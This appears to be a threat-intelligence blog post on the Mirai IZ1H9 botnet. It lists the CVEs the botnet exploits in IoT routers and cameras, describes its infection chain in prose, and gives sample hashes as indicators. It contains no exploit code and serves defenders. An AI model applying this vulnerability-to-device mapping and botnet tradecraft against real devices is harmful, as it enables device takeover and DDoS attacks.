Key Takeaways
What is Mirai IZ1H9?
FortiGuard Labs recently reported on Mirai IZ1H9, which is being used to infect devices for use in a DDoS campaign. It affects Linux devices, particularly IoT devices.
Mirai IZ1H9 is known to leverage at least thirteen different payloads, using recently released exploit code, including a number of CVEs. Some of the CVEs were discovered as recently as this year.
IZ1H9 has been observed targeting a variety of Linux-based devices including D-link devices, Netis routers, Sunhillo SureLine, Geutebruck IP cameras, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, TOTOLINK routers.
The CVEs exploited by IZ1H9 include the following:
CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382
CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, and CVE-2021-45382 are critical severity vulnerabilities that allow threat actors to use a crafted request to deliver command injection. These CVEs affect D-Link devices.
CVE-2019-19356
CVE-2019-19356 affects Netis WF2419 and exploits an RCE vulnerability through tracert. This vulnerability exists due to a lack of user input sanitizing.
CVE-2021-36380, CVE-2021-33544/33548/33549/33550/33551/33552/33553/33554, CVE-2021-27561/27562
CVE-2021-36380, CVE-2021-33544/33548/33549/33550/33551/33552/33553/33554, and CVE-2021-27561/27562 affect Sunhillo, Geutebruck, and Yealink devices and allow arbitrary command execution.
CVE-2023-1389
CVE-2023-1389 is a command injection vulnerability affecting TP-Link Archer AX21 (AX1800).
CVE-2023-23295
CVE-2023-23295 is a command injection vulnerability affecting Korenix JetWave wireless AP.
CVE-2022-40475/25080/25079/25081/25082/25078/25084/25077/25076/38511/25075/25083
CVE-2022-40475/25080/25079/25081/25082/25078/25084/25077/25076/38511/25075/25083 are vulnerabilities affecting TOTOLINK routers.
Other Vulnerabilities
IZ1H9 also leverages an exploit targeting Zyxel device’s /bin/zhttpd/ component vulnerability. In absence of sufficient input validation, a threat actor can exploit the vulnerability to launch an RCE attack.
FortiGuard Labs also noted an additional exploit payload that targets unknown devices. It appears to be very similar to a vulnerability affecting Prolink PRC2402M routers.
Once the payload is injected, it retrieves a shell script downloader from the C2. When the script is executed, it deletes logs in an attempt to cover its tracks then downloads and executes multiple bot clients targeting a variety of Linux architectures.
For the last step, the shell script downloader obstructs network connections on multiple ports by altering the devices’s iptables rules. The infected device is leveraged as one of many in the botnet.
IOCs
PolySwarm has multiple samples of IZ1H9.
c8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63
1e15d7cd0b4682a86620b3046548bdf3f39c969324a85755216c2a526d784c0d
7b9dce89619c16ac7d2e128749ad92444fe33654792a8b9ed2a3bce1fee82e6a
b5daf57827ced323a39261a7e19f5551071b5095f0973f1397d5e4c2fcc39930
b523ea86ebfd666153078593476ca9bd069d6f37fa7846af9e53b1e01c977a17
8d07f15dd7d055b16d50cb271995b768fdd3ca6be121f6a35b61b917dfa33938
df9ee47c783fbe8c3301ed519033fc92b05d7fd272d35c64b424a7e46c6da43b
0aa9836174f231074d4d55c819f6f1570a24bc3ed4d9dd5667a04664acb57147
You can use the following CLI command to search for all xx samples in our portal:
$ polyswarm link list -f IZ1H9
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.